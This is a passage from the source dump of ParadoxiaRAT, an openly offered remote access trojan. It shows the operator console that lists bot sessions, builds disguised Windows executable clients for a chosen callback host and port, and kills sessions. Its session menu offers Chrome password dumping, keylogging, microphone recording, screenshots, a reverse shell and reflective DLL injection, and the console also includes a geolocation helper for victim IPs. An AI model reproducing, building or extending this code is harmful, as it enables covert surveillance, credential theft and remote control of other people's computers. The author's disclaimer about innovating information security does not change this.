"\n[ Session ID : "+str(i) +" ][ Connection : "+iplist[i] + " ][ WAN : "+wan_ip_list[i] +" ][ Operating System : " + oslist[i] + " ]" 833 | ) 834 | except Exception as stre: 835 | print("Error : " + str(stre)) 836 | 837 | _thread.start_new_thread(TCPServer, ()) 838 | global silent 839 | while(True): 840 | try: 841 | if(silent == False): 842 | promptstr = "paradoxia >> " 843 | x = prompt(promptstr) 844 | args = x.split() 845 | if(x == "list" or x == "sessions"): 846 | list_bots() 847 | elif(x.startswith("session")): 848 | try: 849 | cid = args[1] 850 | sock = clients[int(cid)] 851 | sess = ParadoxiaClient(sock) 852 | sess.Session() 853 | except IndexError: 854 | print("USAGE : session < client id >") 855 | 856 | elif(x == "exit"): 857 | if(len(clients) > 0): 858 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] You have online bots? Kill the connections?") 859 | yn = prompt("[+] Your Desicion (y/N) : ").lower() 860 | if(yn == "y"): 861 | broadcast("kill") 862 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Disconnected everyone.") 863 | exit(True) 864 | else: 865 | pass 866 | else: 867 | exit(True) 868 | elif(x == "help"): 869 | print(Style.BRIGHT + Fore.GREEN + 870 | """ 871 | ParadoxiaRAT 872 | --------------- 873 | -> Commands : 874 | -. help - Print this help message. 875 | -. sessions - View online clients. 876 | -. session - interact with a session. 877 | -. build - Build Client. 878 | -. clientinfo < cid > - View session information. 879 | -. kill - Kill session. 880 | -. exit - Exit. 881 | Use the help command inside a session to view Session specific help. 882 | ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= 883 | Created by : QuantumCore (Fahad) 884 | Website : https://quantumcored.com 885 | Email : quantumcore@protonmail.com 886 | Discord : https://discordapp.com/invite/8snh7nx 887 | Github Repository : https://github.com/quantumcored/paradoxia 888 | If you find any bugs, Please Report them here : https://github.com/quantumcored/paradoxia/issues 889 | ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= 890 | The Developer is not responsible for any misuse of Damage caused by the program. This is created only to innovate Information Security and YOU. 891 | """ 892 | + Style.RESET_ALL) 893 | elif(x == "build"): 894 | host = prompt("[+] Host : ") 895 | port = prompt("[+] Port : ") 896 | name = prompt("[+] Installation Name (.exe) : ") 897 | installdir = prompt("[+] Installation Folder name : ") 898 | 899 | output = prompt("[+] Output file name (.exe) : ") 900 | askicon = prompt("[?] Would you like to build with Icon? (Y/n) : ") 901 | askicon = askicon.lower() 902 | if(askicon== "y"): 903 | icon_path = prompt("[+] Icon Path (.ico) : ") 904 | if(len(icon_path) > 0): 905 | if(len(host) > 0 and len(port) > 0 and len(output) > 0 and len(name) > 0 and len(installdir) > 0): 906 | Build(host, port, icon_path,output, name, installdir) 907 | else: 908 | print("[+] NO icon path specified.") 909 | else: 910 | if(len(host) > 0 and len(port) > 0 and len(output) > 0 and len(name) > 0 and len(installdir) > 0): 911 | Build(host, port, None ,output, name, installdir) 912 | else: 913 | print("[+] One or more values not entered correctly.") 914 | elif(x.startswith("kill")): 915 | try: 916 | cid = int(args[1]) 917 | SendData(cid, "kill") 918 | clients[cid].shutdown(socket.SHUT_RDWR) 919 | clients[cid].close() 920 | 921 | except IndexError: 922 | print("USAGE : kill ") 923 | 924 | elif(x.startswith("clientinfo")): 925 | try: 926 | x = int(args[1]) 927 | print(ClientInfoList[x]) 928 | except IndexError: 929 | print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] USAGE : clientinfo < cid >") 930 | 931 | except Exception as UnknownException: 932 | print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Error : " + str(UnknownException)) 933 | 934 | 935 | else: 936 | if(len(x) > 0): 937 | try: 938 | print(Style.BRIGHT + Fore.LIGHTCYAN_EX ) 939 | subprocess.run(['bash', '-c', x]) 940 | print(Style.RESET_ALL) 941 | except Exception as procError: 942 | print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Error : " + str(procError)) 943 | except KeyboardInterrupt: 944 | print("[X] Interrupt, Type exit to Exit.") 945 | -------------------------------------------------------------------------------- /kernel/other.py: -------------------------------------------------------------------------------- 1 | from plyer import notification 2 | import os 3 | from colorama import Style, Fore 4 | import colorama 5 | from PIL import Image 6 | from plyer import notification 7 | import geoip2.database 8 | 9 | 10 | session_help = r""" 11 | 12 | Session Commands 13 | ================= 14 | -. info - View Client information. 15 | -. help - Print this help message. 16 | -. exit - Exit session. 17 | 18 | File Management 19 | ================= 20 | -. upload - Upload files. 21 | -. download - Download files. 22 | -. drives - Get all available drive letters. 23 | -. dir < directory > - Change current directory. (-s switch to specify Name with spaces) 24 | -. delete < file > - Delete a file. 25 | -. ls - List files in current directory. 26 | 27 | Surveillance 28 | ================= 29 | -. screenshot - Take Screen shot. 30 | -. micrecord - Start recording microphone. 31 | -. chromedump - Dump Google Chrome Passwords. 32 | 33 | Information Gathering 34 | ================= 35 | -. admin - Check if Client has Administrator rights. 36 | -. geolocate - Geolocate. 37 | -. keylog_start - Start Logging Keystrokes. 38 | -. keylog_dump - Dump logged Keystrokes and clear buffer. 39 | -. processinfo - Get Process information. 40 | 41 | System 42 | ================= 43 | -. shell - Reverse shell. 44 | -. dllinject - Reflective DLL Injection. Load your own Reflective DLL. 45 | -. poweroff - Shutdown the System. 46 | -. reboot - reboot the System. 47 | -. pkill - Kill a Process. 48 | 49 | Client 50 | ================= 51 | -. kill - Kill Session / Close Session. 52 | -. die - Kill Client and Close connection. 53 | """ 54 | 55 | 56 | def clear_screen(): 57 | if(os.name == "nt"): 58 | os.system("cls") 59 | else: 60 | os.system("clear") 61 | 62 | def saveAndShowImage(image): 63 | try: 64 | im = Image.open(image) 65 | im.save(image, "PNG") 66 | im.show() 67 | except Exception as e: 68 | print("Error converting bmp to png : " + str(e)) 69 | 70 | 71 | 72 | def uniquify(path): 73 | """ 74 | Credits : https://stackoverflow.com/questions/13852700/create-file-but-if-name-exists-add-number/57896232#57896232 75 | """ 76 | filename, extension = os.path.splitext(path) 77 | counter = 1 78 | 79 | while os.path.exists(path): 80 | path = filename + " (" + str(counter) + ")" + extension 81 | counter += 1 82 | 83 | 84 | def PrintTextFile(filename): 85 | try: 86 | with open(filename, "r") as inn: 87 | data = inn.read() 88 | print(data) 89 | except Exception as e: 90 | print("[X] Error : " + str(e)) 91 | 92 | 93 | def notify(title, message): 94 | notification.notify( 95 | title, 96 | message 97 | ) 98 | 99 | def GeoLocate(ip): 100 | database_path = "GeoLite2-City.mmdb" 101 | database = geoip2.database.Reader(database_path) 102 | ip_info = database.city(ip) 103 | ISO_CODE = ip_info.country.iso_code 104 | country = ip_info.country.name 105 | pstlcode = ip_info.postal.code 106 | reigon = ip_info.subdivisions.most_specific.name 107 | city = ip_info.city.name 108 | # location = str(ip_info.location.latitude) + " " + str(ip_info.location.longitude) 109 | location = "https://www.google.com/maps?q="+str(ip_info.location.latitude)+","+str(ip_info.location.longitude) 110 | print( 111 | """ 112 | Geolocation 113 | ---------------- 114 | ISO Code : {isocode} 115 | Country : {country} 116 | Postal Code : {pstl} 117 | Reigon : {reigon} 118 | City : {city} 119 | Location : {loc} 120 | """.format(isocode = ISO_CODE, 121 | country = country, 122 | pstl = pstlcode, 123 | reigon = reigon, 124 | city = city, 125 | loc = location) 126 | ) 127 | 128 | return 129 | """\n 130 | [+] ISO Code : {isocode} 131 | [+] Country : {country} 132 | [+] Postal Code : {pstl} 133 | [+] Reigon : {reigon} 134 | [+] City : {city} 135 | [+] Location : {loc} 136 | """.format(isocode = ISO_CODE, 137 | country = country, 138 | pstl = pstlcode, 139 | reigon = reigon, 140 | city = city, 141 | loc = location 142 | ) -------------------------------------------------------------------------------- /kernel/scanner.py: -------------------------------------------------------------------------------- 1 | """ 2 | 3 | Have a good time reading the source. You are an amazing person. 4 | 5 | """ 6 | import geoip2.database 7 | import socket 8 | database_path = "GeoLite2-City.mmdb" 9 | 10 | def scan_ip(IP_ADDR): 11 | 12 | try: 13 | database = geoip2.database.Reader(database_path) 14 | ip_info = database.city(IP_ADDR) 15 | ISO_CODE = ip_info.country.iso_code 16 | country = ip_info.country.name 17 | pstlcode = ip_info.postal.code 18 | reigon = ip_info.subdivisions.most_specific.name 19 | city = ip_info.city.name 20 | # location = str(ip_info.location.latitude) + " " + str(ip_info.location.longitude) 21 | location = "https://www.google.com/maps?q="+str(ip_info.location.latitude)+","+str(ip_info.location.longitude) 22 | 23 | print("[+] IP : " + str(IP_ADDR)) 24 | print(" |_ ISO Code : " + str(ISO_CODE)) 25 | print(" |_ Country : " + str(country)) 26 | print(" |_ Postal Code : "+str(pstlcode)) 27 | print(" |_ Reigon : " + str(reigon)) 28 | print(" |_ City : " + str(city)) 29 | print(" |_ Location : " + str(location)) 30 | 31 | 32 | except Exception as ERROR: 33 | print("[SCANNER ERROR] : {error}".format(error = ERROR)) 34 | print("[+] IP : " + str(IP_ADDR)) 35 | print(" |_ Do further scanning with nmap and / or Blacklist.") 36 | 37 | -------------------------------------------------------------------------------- /loot/README.md: -------------------------------------------------------------------------------- 1 | # LOOT 2 | -------------------------------------------------------------------------------- /paradoxia.ini: -------------------------------------------------------------------------------- 1 | # Server Settings 2 | [server] 3 | host = 0.0.0.0 4 | port = 443 5 | # Bot Settings 6 | [bot] 7 | verbose = True 8 | auto_print_bot_info = False 9 | -------------------------------------------------------------------------------- /paradoxia.py: -------------------------------------------------------------------------------- 1 | """ 2 | #!/usr/bin/python3 3 | """ 4 | 5 | """ 6 | 7 | Have a good time reading the source. You are an amazing person. 8 | 9 | """ 10 | from kernel.main import * 11 | from kernel.other import * 12 | from kernel.banner import pbanner 13 | import _thread 14 | 15 | def main(): 16 | clear_screen() 17 | print(pbanner()) 18 | Console() 19 | 20 | main() 21 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | geoip2 2 | configparser 3 | plyer 4 | tqdm 5 | names 6 | random-username 7 | requests 8 | requests[socks] 9 | stem 10 | colorama 11 | --------------------------------------------------------------------------------